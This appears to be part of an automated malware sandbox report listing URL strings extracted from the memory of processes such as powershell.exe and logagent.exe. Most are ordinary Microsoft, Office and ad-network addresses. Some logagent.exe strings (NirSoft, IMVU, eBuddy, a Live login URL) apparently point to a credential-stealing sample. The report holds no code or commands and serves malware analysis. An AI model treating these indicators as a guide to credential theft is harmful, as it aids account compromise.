Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.imvu.com
Source: logagent.exe, 00000025.00000002.411203405.0000000003279000.00000004.00000001.sdmp	String found in binary or memory: http://www.imvu.com/I
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com/
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: logagent.exe, 00000024.00000002.424555845.0000000002D63000.00000004.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: logagent.exe, 00000026.00000002.411330653.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.aadrm.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.cortana.ai
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.office.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.onedrive.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://augloop.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cdn.entity.
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://clients.config.office.net/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://config.edge.skype.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: logagent.exe, 00000024.00000003.416634224.0000000004EE6000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.416762003.0000000004EE6000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.421925979.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cortana.ai
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cortana.ai/api
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://cr.office.com
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dev.cortana.ai
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://devnull.onenote.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://directory.services.
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000004.00000003.296733564.0000000005D94000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://graph.windows.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://graph.windows.net/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://lifecycle.office.com
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
